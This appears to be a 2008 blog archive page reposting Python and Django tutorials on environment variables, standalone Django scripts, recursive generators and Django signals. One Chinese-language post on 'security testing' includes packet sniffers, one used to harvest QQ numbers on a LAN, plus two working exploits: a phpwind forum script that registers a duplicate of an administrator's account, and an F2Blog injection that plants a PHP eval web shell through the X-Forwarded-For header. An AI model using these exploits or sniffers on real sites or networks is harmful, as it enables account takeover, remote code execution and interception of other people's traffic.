Monday, October 27, 2008

Django|python path

Setting Django Environment Variables in a Python Script

Posted: July 15, 2007
Author: Scott Newman
Category: Python, Django

When running Python programs to interact with the Django API, you don't always have the PYTHONPATH and DJANGO_SETTINGS_MODULE defined.

Before I learned this trick, I used to put my programs inside shell scripts that exported the path and settings variables before running the program. Crude, but effective.

One important thing to remember: If you're using the Django API, you must put these steps in before you try to import any Django elements (views, models, etc.)

To set environment variables:

import os

os.environ['PYTHONPATH'] = '/home/code'
os.environ['DJANGO_SETTINGS_MODULE'] = 'myproject.settings'

To add locations to the search path:

import sys

sys.path.append(0, '/home/code')

You can view the search path and environment variables like this:

import sys, os

print sys.path
print os.environ.keys()

Further Reading

Dive Into Python, Chapter 2.4.1. The Import Search Path
http://www.diveintopython.org/getting_to_know_python/everything_is_an_object.html#d0e4550

Python Library Reference, Chapter 14.1.1 Process Parameters
http://docs.python.org/lib/os-procinfo.html

Django|Standalone Django scripts

Standalone Django scripts

An entry published by James Bennett on September 22, 2007, Part of the category Django. Nine comments posted.

In the grand tradition of providing answers to frequently-asked questions from the django-users mailing list and the #django IRC channel, I’d like to tackle something that’s fast becoming the most frequently-asked question: how do you write standalone scripts which make use of Django components?

At first glance, this isn’t a terribly hard thing to do: Django’s just plain Python, and all of its components can — in theory — be imported and used just like any other Python modules. But the thing that trips most people up is the need, in most parts of Django, to supply some settings Django can use so it’ll know things like which database to connect to, which applications are available, where it can find templates, etc.

Depending on exactly what you need to do, there are several ways you can approach this problem, so let’s run through each of them in turn.

Set DJANGO_SETTINGS_MODULE before you run

The simplest method is to simply assign a value to the DJANGO_SETTINGS_MODULE environment variable before you run your script, and that’s not terribly hard to do if you understand a little bit about how environment variables work. On most Unix-based systems (including Linux and Mac OS X), you can typically do this with the export command of the standard shell:

export DJANGO_SETTINGS_MODULE=yoursite.settings

Then you can just run any scripts which rely on Django settings, and they’ll work properly. If you’re using a different shell, or if you’re on Windows, the exact command to type will be slightly different, but the idea is the same.

One extremely useful application of this is in a crontab file; cron lets you set and change environment variables with ease, so you can have things like this in your crontab:

# Cron jobs for foo.com run at 3AM

DJANGO_SETTINGS_MODULE=foo.settings

0 3 * * * python /path/to/maintenance/script.py
30 3 * * * python /path/to/other/script.py

# Cron jobs for bar.com run at 4AM

DJANGO_SETTINGS_MODULE=bar.settings

0 4 * * * python /path/to/maintenance/script.py
30 4 * * * python /path/to/other/script.py

This is pretty much exactly what the crontab files on our servers at World Online look like, and in general this is the cleanest way to handle scripts which use Django components and need to run as cron jobs.

Use setup_environ()

Back in May, Jared Kuolt wrote up this technique, which is exactly how Django’s own manage.py script handles settings: the function setup_environ() in django.core.management will, given a Python module containing Django settings, handle all the business of (appropriately for its name) setting up your environment for you:

from django.core.management import setup_environ
from mysite import settings

setup_environ(settings)

Below the setup_environ() line, you can make use of any Django component and rest assured that the proper settings will be available for it.

The only real disadvantage to this is that you lose some flexibility: by tying the script to a particular settings module, you’re also tying it to a particular Django project, and if you later want to re-use it you’ll have to make a copy and change the import to point at another project’s settings file, or find a different way to configurably accept the settings to use (we’ll look at that again in a moment). If all you need is a one-off script for a particular project, though, this is an awfully handy way to set it up.

Use settings.configure()

For cases where you don’t want or need the overhead of a full Django settings file, Django provides a standalone method for configuring only the settings you need, and without needing to use DJANGO_SETTINGS_MODULE: the configure() method of the LazySettings class in django.conf (django.conf.settings is always an instance of LazySettings, which is used to ensure that settings aren’t accessed until they’re actually needed). There’s official documentation for this, and it’s fairly easy to follow along and use it in your own scripts:

from django.conf import settings

settings.configure(TEMPLATE_DIRS=('/path/to/template_dir',), DEBUG=False,
TEMPLATE_DEBUG=False)

And then below the configure() line you’d be able to make use of Django’s template system as normal (because the appropriate settings for it have been provided). This technique is also handy because for any “missing” settings you didn’t configure it will fill in automatic default values (see Django’s settings documentation for coverage of the default values for each setting), or you can pass a settings module in the default_settings keyword argument to configure() to provide your own custom defaults.

Like setup_environ(), this method does tie you down to a particular combination of settings, but again this isn’t necessarily a problem: it’s fairly common to have project-specific scripts which won’t need to be re-used and rely on some values particular to that project.

Accept settings on the command line

We’ve seen that setup_environ() and settings.configure() both seem to tie you to a particular settings module or combination of manually-provided settings, and while that’s not always a bad thing it presents a major stumbling block to reusable applications. Setting DJANGO_SETTINGS_MODULE (as seen above in the context of a crontab) is much more flexible, but can be somewhat tedious to do over and over again. So why don’t we come up with a method that lets you specify the settings to use when you call the script?

As it turns out, this is extremely easy to do; I think the technique doesn’t get a lot of attention because most newcomers to Django don’t yet know their way around Python’s standard library and so don’t stumble across the module which makes it all simple: optparse. In a nutshell, optparse provides an easy way to write scripts which take traditional Unix-style command line arguments, and to get those arguments translated into appropriate Python values.

A simple example would look like this:

import os
from optparse import OptionParser

usage = "usage: %prog -s SETTINGS | --settings=SETTINGS"
parser = OptionParser(usage)
parser.add_option('-s', '--settings', dest='settings', metavar='SETTINGS',
help="The Django settings module to use")
(options, args) = parser.parse_args()
if not options.settings:
parser.error("You must specify a settings module")

os.environ['DJANGO_SETTINGS_MODULE'] = options.settings

There’s a lot going on here in a very small amount of code, so let’s walk through it step-by-step:

  1. We import the standard os module and the OptionParser class from optparse.
  2. We set up a usage string; optparse will print this in help and error messages.
  3. We create an OptionParser with the usage string.
  4. We add an option to the OptionParser: the script will accept an argument, either as -s or as the long option settings, which will be stored in the value attribute “settings” of the parsed options, and we provide it with some explanatory text to show in help and error messages.
  5. We parse the arguments from the command line using parser.parse_args().
  6. We check to see that the “settings” argument was supplied, and direct the parser to throw an error if it wasn’t.
  7. We use os.environ to set DJANGO_SETTINGS_MODULE.

Not bad for about ten lines of easy-to-write code; once that’s been done, DJANGO_SETTINGS_MODULE will have been set and we can use any Django components we like. Running the script will look like this:

python myscript.py --settings=yoursite.settings

The parser created with optparse will handle the parsing; it’ll also automatically enable a “help” option for the -h or —help flags which will list all of the available options and their help text, and show appropriate error messages when the required “settings” argument isn’t supplied.

Because optparse makes it easy to pack a lot of configurability into a small amount of code, it’s generally my preferred method for writing standalone scripts which need to interact with Django, and I highly recommend spending some time with its official documentation. If you’d like to use one of the other configuration methods — setup_environ() or settings.configure() — it’s relatively easy to write an optparse-based script which does the right thing.

And that’s a wrap

Each of these methods is appropriate for different types of situations, and depending on exactly what you need to do you may end up using all of them at various times. Personally, I tend to either write scripts which use optparse and take a command-line argument for settings, or (for maintenance tasks which will run in cron) to write scripts which just assume DJANGO_SETTINGS_MODULE is taken care of in advance, but all of these methods can be useful, so keep them all in mind whenever you find yourself needing a standalone script that uses Django.

Sunday, October 26, 2008

Python|常用辅助安全测试6个代码例子

Python常用辅助安全测试6个代码例子


这些代码,大部分是从别处转来的。测试的时候会比较有用。比如数据嗅探,发送请求,正则表达式处理文件,注入测试等。
实际中可以根据自己的项目,进行一定程度的扩展。代码是简洁为主。这部分代码是偏重安全测试的。
学习python已经3月了。感觉非常有用。
前些天,pm还让我写一个程序辅助他办公。

近来发现很多公司也开始在自己的招聘职位上加上了python。
对于python。功能说的太多没有用,我发一些例子。
我也推荐大家有时间不妨学习一下。一天基本上就可以学会。
外国非常流行。我的pm是德国人,他们国家好像是直接学习python,就像咱们学习c一样普及。
国外搞python开发的人很多,公司也很多。国内的相对较少。
我学习这个,是为了辅助工作和玩hack。日常用也很强大。
google有个google app enginer,是个类似虚拟主机的服务。使用python开发web应用。
另外,google本身是基于python的。

大多数应用,都可以使用一个函数搞定,比如文件下载,发送请求,分析网页,读写xml,文件压缩,爬虫搜索。
这些应用绝大多数是跨平台的。可以在linux下运行。
ironpyhon是一个组合.net平台和python的工具,他们正在研究如何利用python把.net放在linux上运行。

诺基亚的手机也开始支持python编程。
java,.net 也开始提供python版本。

下面举些例子,演示一下python的功能。

1、数据嗅探,这个例子,是嗅探土豆网上的flash真正的播放地址。
import pcap ,struct , re
from pickle import dump,load
pack=pcap.pcap()
pack.setfilter('tcp port 80')
regx=r'/[\w+|/]+.flv|/[\w+|/]+.swf'
urls=[]
hosts=[]
print 'start capture....'
for recv_time,recv_data in pack:
urls=re.findall(regx,recv_data);
if(len(urls)!=0):print urls;

2、嗅探qq号码,前些天我还用它嗅探局域网里所有的qq那。可惜没有识别性别的功能。不过可以自己添加

# -*- coding: cp936 -*-
import pcap ,struct
pack=pcap.pcap()
pack.setfilter('udp')
key=''
for recv_time,recv_data in pack:
recv_len=len(recv_data)
if recv_len == 102 and recv_data[42]== chr(02) and recv_data[101]
== chr(03):
print struct.unpack('>I',recv_data[49:53])[0]
elif recv_len == 55:
print struct.unpack('>I',recv_data[49:53])[0]

3、数据嗅探,项目中遇到,需要嗅探一些发送到特定端口的数据,于是花了几分钟写了一个程序。

import pcap ,struct
from pickle import dump,load
pack=pcap.pcap()
pack.setfilter('port 2425')
f=open(r'/mm.txt','w+')
print 'start capture....'
for recv_time,recv_data in pack:
print recv_time
print recv_data
f.write(recv_data)

3、5 文件内容搜索,我发现windows的自带的搜索无法搜索内容。即使搜索到也不准。就自己写了一个

import os,string,re,sys

class SevenFile:
files=[]
def FindContent(self,path):
print 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
walks=os.walk(path)
for walk in walks:
for filename in walk[2]:
if('.mht' == filename[-4:]):
res_taskid=[]
file=walk[0]+'\\'+filename
f=open(file)
content=f.read()
pattern_taskid=re.compile(r'Stonehenge-UIVerificationChecklist\.mht',re.IGNORECASE) #
res_taskid=pattern_taskid.findall(content)
f.close()
if len(res_taskid)>0:
self.files.append(file)

def run():
f=SevenFile()
f.FindContent(r"E:\work\AP\Manual Tests\PSIGTestProject\PSIGTestProject")
for filepath in f.files:
print filepath
print "OK"

if __name__=="__main__":
run()

4、这个不是我写的,是一个网上的攻击phpwind论坛的一个代码

# -*- coding: gb2312 -*-
import urllib2,httplib,sys
httplib.HTTPConnection.debuglevel = 1
cookies = urllib2.HTTPCookieProcessor()
opener = urllib2.build_opener(cookies)

def usage():
print "Usage:\n"
print " $ ./phpwind.py pwforumurl usertoattack\n"
print " pwforumurl 目标论坛地址如http://www.80sec.com/"
print " usertoattack 目标拥有权限的斑竹或管理员"
print " 攻击结果将会在目标论坛注册一个和目标用户一样的帐户"
print " 最新版本可以使用uid登陆"
print " 其他版本可以使用cookie+useragent登陆"
print "########################################################"
print ""

argvs=sys.argv
usage()

data = "regname=%s
%s1&regpwd=@80sec&regpwdrepeat=@80sec&regemail=...@foo.com&regemailtoall=1&step=2"
% (argvs[2],"%c1")
pwurl = "%s/register.php" % argvs[1]

request = urllib2.Request(
url = pwurl ,
headers = {'Content-Type' : 'application/x-www-form-
urlencoded','User-Agent': '80sec owned this'},
data = data)
f=opener.open(request)
headers=f.headers.dict
cookie=headers["set-cookie"]
try:
if cookie.index('winduser'):
print "Exploit Success!"
print "Login with uid password @80sec or Cookie:"
print cookie
print "User-agent: 80sec owned this"
except:
print "Error! http://www.80sec.com"
print "Connect root#80sec.com"

5、黑客注入攻击,针对指定网站的注入演示

#!c:\python24\pyton
# Exploit For F2Blog All Version
# Author BY MSN:pt...@vip.sina.com
# Date: Jan 29 2007

import sys
import httplib
from urlparse import urlparse
from time import sleep

def injection(realurl,path,evil): #url,/bk/,evilip
cmd=""
cookie=""
header={'Accept':'*/*','Accept-Language':'zh-
cn','Referer':'http://'+realurl[1]+path+'index.php','Content-
Type':'application/x-www-form-urlencoded','User-
Agent':useragent,'Host':realurl[1],'Content-length':len(cmd),
'Connection':'Keep-Alive','X-Forwarded-
For':evil,'Cookie':cookie}
#cmd =
"formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=
%E6%8F%90+%C2%A0+%E4%BA%A4"
#print header
#print path
#sys.exit(1)
http = httplib.HTTPConnection(realurl[1])
http.request("POST",path+"index.php",cmd, header)
sleep(1)
http1 = httplib.HTTPConnection(realurl[1])
http1.request("GET",path+"cache/test11.php")
response = http1.getresponse()
re1 = response.read()
#print re1
print re1.find('test')
if re1.find('test') ==0:
print 'Expoilt Success!\n'
print 'View Your shell:\t%s' %shell
sys.exit(1);

else:
sys.stdout.write("Expoilt FALSE!")
http.close()
#sleep(1)
#break
sys.stdout.write("\n")

def main ():
print 'Exploit For F2Blog All Version'
print 'Codz by pt...@vip.sina.com\n'
if len(sys.argv) == 2:
url = urlparse(sys.argv[1])
if url[2:-1] != '/':
u = url[2] + '/'
else:
u = url[2] #u=/bk/
else:
print "Usage: %s " % sys.argv[0]
print "Example: %s http://127.0.0.1/bk" % sys.argv[0]
sys.exit(0)

print '[+] Connect %s' % url[1]
print '[+] Trying...'
print '[+] Plz wait a long long time...'
global shell,useragent
shell="http://"+url[1]+u+"cache/test11.php"
query ='fputs(fopen(\'cache/test11.php\',\'w+\'),\'@eval($_REQUEST[c])?>test\')'
query ='\'));'+query+';/*'
evilip=query
useragent=""
cookie=""
injection(url,u,evilip)
evilip=""
injection(url,u,evilip)

print '[+] Finished'

if __name__ == '__main__': main()

6、黑客注入攻击,这是一个完整的access+asp注入工具。
代码有点长,自己下载吧。

http://www.xfocus.net/tools/200408/780.html

国外还有更厉害的python注入工具(sqlmap),支持现在基本上所有的数据库。 MySQL, Oracle, PostgreSQL and Microsoft SQL
Server database management system back-end. Besides these four DBMS,
sqlmap can also identify Microsoft Access, DB2, Informix and Sybase;

自己搜索下载吧。

支持get,post ,cookie注入。可以添加cookie和user-agent
支持盲注,错误回显注入,还有其他多种注入方法。
支持代理,
优化算法,更高效。
指纹识别技术判断数据库

Wednesday, October 22, 2008

Python|Recursion and Generators

Recursion and Generators

[Japanese]

Abstract: A certain kind of problems can be described with recursive procedures quite efficiently. But sometime you need strict control over recursive procedures which produces a huge amount of data, which adds difficulty to coding. Python generators, which are available in Python 2.2 or later, allows us to control these procedures easily preserving concise programs.

The source code mentioned in this document is here. The plain text version is here.


Introduction

No one doubts the power of recursion. Although it sometime might look a little bit complicated, it normally provides a quick way to describe a solution. This is especially true if the size of data handled by a procedure grows exponentially. Traversing a tree is a good example. Since each node in a tree has one or more nodes, as the procedure goes down the tree, the number of nodes grows in exponential order. But if all nodes are homogeneous, the same procedure can apply to every node again and again.

Tree traversal is a trivial example of recursion, because almost every Computer Science textbook explains this. Probably everyone will happily choose recursion for tree traversal without any deep consideration. Of course however, there are many tasks where recursion works pretty well. So let us take another example.

Consider the following function f which takes a set of vectors (V1, V2, V3, ... , Vn) and returns a set of all possible combinations of each element of Vi. Each combination consists of n-element vectors (xi1, xi2, ... , xim) where xij is an element of Vi. The total number of vectors this function returns is |V1| x |V2| x |V3| x ... x |Vn|.

Let us consider implementing this function in Python. For simplicity, we use String objects to represent each vector Vi. The function returns a set of vectors as a list. The expected result is the following:

f([]) --> ['']  # 1
f(['abc']) --> ['a', 'b', 'c'] # 3
f(['abc', 'xyz']) --> ['ax', 'ay', 'az', 'bx', 'by', 'bz', 'cx', 'cy', 'cz'] # 9
f(['abc', 'xyz', '123']) --> ['ax1', 'ax2', 'ax3', 'ay1', 'ay2', 'ay3', 'az1', 'az2', 'az3',
'bx1', 'bx2', 'bx3', 'by1', 'by2', 'by3', 'bz1', 'bz2', 'bz3',
'cx1', 'cx2', 'cx3', 'cy1', 'cy2', 'cy3', 'cz1', 'cz2', 'cz3'] # 27

At a first glance, it looks easy to implement. You might think that this function can be written easily without using any recursion. Let's try.


Solutions

First, if you don't want to use recursion at all, your program might end up with something like this:

Non-recursive Version

def f0(args):
counter = [ 0 for i in args ]
r = []
while 1:
r.append("".join([ arg1[i] for arg1,i in zip(args, counter) ]))
carry = 1
x = range(len(args))
x.reverse() # x == [len(args)-1, len(args)-2, ..., 1, 0]
for i in x:
counter[i] += 1
if counter[i] < len(args[i]):
carry = 0
break # leave "for"
counter[i] = 0
else:
break # leave "while"
return r

Without using recursion, you have to remember intermediate states somehow to produce all possible solutions. In this program, I tried to emulate something like full-adders. First the program prepares a list of integers and then repeatedly attempts to add one to the least significant digit. At each iteration, it concatenates elements in each argument and put it into variable r. But the behavior of this program is not so clear, even though some variable names such as "carry" are suggestive.

Recursive Version

Now you have recursion. The function f can be defined recursively as follows:

f(Vi, Vi+1, ... , Vn) = ({xi1} + f(Vi+1, ... , Vn)) +

({xi2} + f(Vi+1, ... , Vn)) +

...

({xim} + f(Vi+1, ... , Vn)) .

With this definition, you can make the program a much simpler by calling itself:

def fr(args):
if not args:
return [""]
r = []
for i in args[0]:
for tmp in fr(args[1:]):
r.append(i + tmp)
return r

The implementation above is very straightforward. The power of recursion is that you can split the problem into several subproblems and apply the exactly same machinery to each subproblem. This program simply takes the first element of each argument and concatenate it with every solution of this function with one fewer arguments (Fig 1).


Fig 1. Recursive Version

More Solutions

So far we have seen functions which return all the results at a time. But in some applications such as searching or enumerating, you probably don't want to remember all combinations. What you want to do is just to inspect one combination at each time, and throw away after using it.

When the number of outputs is small, this is not a big deal. But what we expected for recursive procedures is to provide a quick solution for functions whose result grows exponentially, right? Ironically, however, such functions tend to produce a huge amount of data that cause problems in your program. In many language implementations, they cannot remember all the results. Sooner or later it will reach the maximum limit of the memory:

$ ulimit -v 5000
$ python
...
>>> for x in fr(["abcdefghij","abcdefghij","abcdefghij","abcdefghij","abcdefghij"]):
... print x
...
Traceback (most recent call last):
File "", line 1, in ?
File "", line 7, in fr
MemoryError

The typical solution for this is to split every combination into different states. The typical way to do this in Python is to build an iterator.

Iterator Version

In Python, a class which has a __iter__ method can be used as iterators. Although iterators are not functionally identical to lists, they can be taken instead of lists in some statements or functions (for, map, filter, etc).

class fi:
def __init__(self, args):
self.args = args
self.counter = [ 0 for i in args ]
self.carry = 0
return

def __iter__(self):
return self

def next(self):
if self.carry:
raise StopIteration
r = "".join([ arg1[i] for arg1,i in zip(self.args, self.counter) ])
self.carry = 1
x = range(len(self.args))
x.reverse() # x == [len(args)-1, len(args)-2, ..., 1, 0]
for i in x:
self.counter[i] += 1
if self.counter[i] < len(self.args[i]):
self.carry = 0
break
self.counter[i] = 0
return r

# display
def display(x):
for i in x:
print i,
print
return

In this program, you can use the constructor of the class fi in the same manner as the recursive version fr as in:

>>> display(fi(["abc","def"])) 

When this instance is passed to a for statement, the __iter__ method is called and the returned object (the object itself in this case) is used as the iterator of the loop. At each iteration, the next method is called without argument and the return value is stored in the loop variable.

However, this program is not easy to understand. Algorithmically, it is similar to the non-recursive version I described above. Each time next method is called, it updates the current state stored in counter variable and returns one result according to the current state. But it looks even more complicated, since the method is designed to be called in between a loop, which is not shown explicitly here. Readers might be upset by seeing that it checks carry variable at the top of the next procedure. They have to imagine an (invisible) loop outside this method to understand this.

Generator Version

Now we have generators. The program gets much simpler:
def fg(args):
if not args:
yield ""
return
for i in args[0]:
for tmp in fg(args[1:]):
yield i + tmp
return
Note that this is not only simpler than the iterator version, but also even simpler than the original version with recursion. With generators, we can simply throw (or "yield") results one at a time, and forget them after that. It is just like printing results to a stream device. You don't have to really care about preserving states. All you have to do is just to produce all results recklessly, and still you can have strict control over that procedure. You might notice that the similar function can be realized with lazy evaluation, which is supported in some functional languages. Although lazy evaluation and generators are not exactly same notion, both of them facilitate to handle the same situation in a different kind of form.

Lambda-encapsulation Version

Perhaps functional programmers might prefer lambda encapsulation to objects. Python also allows us to do this. In fact, however, this was a real puzzle to me. I could do things in the same manner as I did the iterator version. But I wanted to do something different. After hours of struggles, I finally came up with something like this:

def fl(args, i=0, tmp="", parent_sibling=None):
if not args:
# at a leaf
return (tmp, parent_sibling)
if i < len(args[0]):
# prepare my sibling
sibling = fl(args, i+1, tmp, parent_sibling)
return lambda: fl(args[1:], 0, tmp+args[0][i], sibling)
else:
# go up and visit the parent's sibling
return parent_sibling

# traverse function for lambda version
def traverse(n):
while n:
if callable(n):
# node
n = n()
else:
# leaf
(result, n) = n
print result,
print

The idea is indeed to take it as tree traversal. The function f can be regarded as a tree which contains a partial result at each node (Fig 2). A function produced by fl retains its position, the next sibling node, and the next sibling of the parent node in the tree. As it descends the tree, the elements of the vectors are accumulated. When it reaches at a leaf it should have one complete solution (a combination of elements). If there is no node to traverse in the same level, it goes back to the parent node and tries the next sibling of the parent node. We need a special driver routine to traverse the tree.


Fig 2. The Function f as Tree Traversal

Of course the generator version can be also regarded as tree traversal. In this case, you will be visiting a tree and dropping a result at each node.


CHANGES:
Jun 1, 2003: Released.
Jun 7, 2003: A small update based on the comments by Eli Collins.

Tuesday, October 21, 2008

Django|Signals in Django: Stuff That’s Not Documented (Well)

Ref From URL:http://www.chrisdpratt.com/2008/02/16/signals-in-django-stuff-thats-not-documented-well/

I’ve just spent the last few hours learning how to use signals in Django. After many, many searches on Google and much trial and error, I think I finally have a grasp on these silly things, and since I’m an all around nice guy, I’m going to spare those lucky few that happen upon this post the same hell.

Before I start, I want to go ahead and give credit to those who provided some of the crucial pieces to the puzzle during my quest.

Okay, now let’s get started.

Creating Custom Signals

In the application I’m working on, I needed to send an email whenever a user reset his/her password, a pretty common use case. Unfortunately, none of Django’s built-in signals fit the bill. The User model gets saved when the password is reset (allowing the use of the post_save signal), but it also gets saved in a lot of other scenarios. The password reset is a special case and needed to be handled as such.

Turns out that it’s actually not that difficult to set this up. If you haven’t already, create a file named signals.py in directory of the application you’re working on. Then in that file, add the following:

  1. # myapp/signals.py
  2. password_reset = object()

The name `password_reset` is inconsequential; use whatever name best conveys the action that causes the signal to be sent.

Next, set up a listener for that signal. The following code can technically go just about anywhere, as long as it gets executed before the signal is sent. I put it in models.py for ease.

  1. # myapp/models.py
  2. from django.dispatch import dispatcher
  3. from myproject.myapp import signals as custom_signals
  4. ...
  5. dispatcher.connect(send_password_reset_email, signal=custom_signals.password_reset)

`send_password_reset_email` is the function that will be called when the signal is received. Obviously, we’ll need to set that up. Back to signals.py:

  1. # myapp/signals.py
  2. from django.conf import settings
  3. from django.core.mail import send_mail
  4. from django.contrib.sites.models import Site
  5. from django.template.loader import render_to_string
  6. ...
  7. def send_password_reset_email(sender, user, new_pass, signal, *args, **kwargs):
  8. current_site = Site.objects.get_current()
  9. subject = "Password Reset on %(site_name)s" % { 'site_name': current_site.name }
  10. message = render_to_string(
  11. 'account/password_reset_email.txt',
  12. { 'username': user.username,
  13. 'new_pass': new_pass,
  14. 'current_site': current_site }
  15. )
  16. send_mail(subject, message, settings.DEFAULT_FROM_EMAIL, [user.email])

Exactly how this code works is left as an exercise to the reader. I provided it merely to be comprehensive. What the function that gets called when the signal is received does will be specific to your purposes.

However, there are a few points worth mentioning. When you use Django’s built-in signals, your function definition will almost invariably look like the following:

  1. def my_function(sender, instance, signal, *args, **kwargs):

Notice that my definition didn’t include `instance` and had `user` and `new_pass` arguments instead. You can pass whatever arguments you like when you send the signal (we’ll get to this in a second). The only requirement is that the function that gets called can handle them. Django simply chose to use an argument named `instance`, nothing more, nothing less.

Finally, at the exact point where you want function associated with the signal executed (in my case, right after a new password is generated and the User instance is saved) insert the following:

  1. dispatcher.send(signal=custom_signals.password_reset, user=self.user, new_pass=new_pass)

The only required part is obviously the signal you want to send. Everything after is simply data you’d like to pass along. Remember that the function definition in signals.py must accept all the arguments you choose to pass in.

Also don’t forget to add the following to your imports in the file where you call dispatcher.send():

  1. from django.dispatch import dispatcher
  2. from myproject.myapp import signals as custom_signals

And we’re done. Easy as pie, once you know what you’re doing.

Signaling Just When an Object is Created

Conspicuously missing from Django’s built-in signals is one for the creation of an object. We have pre_save and post_save signals, but both of those work whether the object is being created or just being updated.

Again, finding a solution to this little issue was spurred by my own needs. I wanted to send a welcome email when a user first registers, another common use case. Obviously, I didn’t want the same welcome email sent everytime the user updates their details so post_save was out. Or was it?

After a fair amount of digging, I found the solution squirreled away in Django’s model tests. Apparently, Django automagically passes in a `created` flag if the object was created, so all that’s required is to test for that flag before you whatever you plan on doing (sending the welcome email in my case).

  1. def send_welcome_email(sender, instance, signal, *args, **kwargs):
  2. if 'created' in kwargs:
  3. if kwargs['created']:
  4. # Send email

First, we test that a `created` argument was passed in. If it was, we verify that it’s value is True.

Finally, set up a listener as usual. Again, where you put it matters not as long as it gets executed before the signal gets sent; models.py is a good place.

  1. # myapp/models.py
  2. from django.dispatch import dispatcher
  3. from django.db.models import signals
  4. ...
  5. dispatcher.connect(send_welcome_email, signal=signals.post_save, sender=UserProfile)

The `sender` argument limits the signal to being sent only for that particular model. I chose to send it upon the creation of UserProfile, the profile module associated with User in my app. If you left this part out, our send_welcome_email function would be called everytime any model in your application was saved, which would obviously not be desirable.

And, just like that, you get code that will only execute when the model is first created.

Handling Signals Asynchronously

Both of the above examples send emails. It normally doesn’t take much time to send an email, but if the server load is heavy, it could take longer than normal. Ideally, anytime you do anything like this, you want it to be done asynchronously so that users don’t have to wait for the processing to finish before they can move on to something else.

Django’s signals provide half the functionality by decoupling the code for sending the email from the view. However, by default, Django’s signals are synchronous; the signal gets sent and the application waits for its successful completion before moving on. Thankfully, Python has the answer in its threading module.

A thread, extremely simplified, can be thought of as a branch of a running program (Django in this case). It becomes its own entity, able to run independently of its parent process. Extremely simplified, again, you could think of it as a little mini-Django tasked with a very specific and finite purpose. Once it completes its function, it goes away. This purchases us the ability to let something run, while still continuing on in our application in general.

While it sounds rather complicated, it’s actually relatively easy to set up. The following is the actual code I’m using for the welcome email discussed earlier:

  1. import threading
  2. ...
  3. class WelcomeEmailThread(threading.Thread):
  4. def __init__(self, instance):
  5. self.instance = instance
  6. threading.Thread.__init__(self)
  7. def run (self):
  8. # The actual code we want to run, i.e. sending the email
  9. def send_welcome_email(sender, instance, signal, *args, **kwargs):
  10. if 'created' in kwargs:
  11. if kwargs['created']:
  12. WelcomeEmailThread(instance).start()

First, we create a new class which subclasses threading.Thread. The name of the class is inconsequential; just pick something descriptive. In this class, we have two functions defined: `__init__` and `run`.

The `__init__` function is provided to allow us to pass in the instance we received from the signal. We store the instance as an attribute so it can be retrieved later, and then we call the `__init__` method on threading.Thread. This is necessary because we have overloaded (replaced) the `__init__` function inherited from threading.Thread, but we did not replace all of its functionality as well. Therefore, it still needs to complete its normal initialization procedures.

The `run` function is the heart of the class. This is where the email sending will now occur.

Finally, in the `send_welcome_email` function, which previously housed the code for sending the email, we now start the thread instead. The `if` statements are just specifying that this code should only run if the object is being created instead of updated (see previous topic).

That’s all that’s required. Now, when the signal is received it will simply spawn off a thread to send the email and return processing back to the rest of our application. Not bad at all.

Wrap Up

That’s all I’ve got for now, but I think it covers the three most confusing areas of Django’s signals. Happy Django’ing.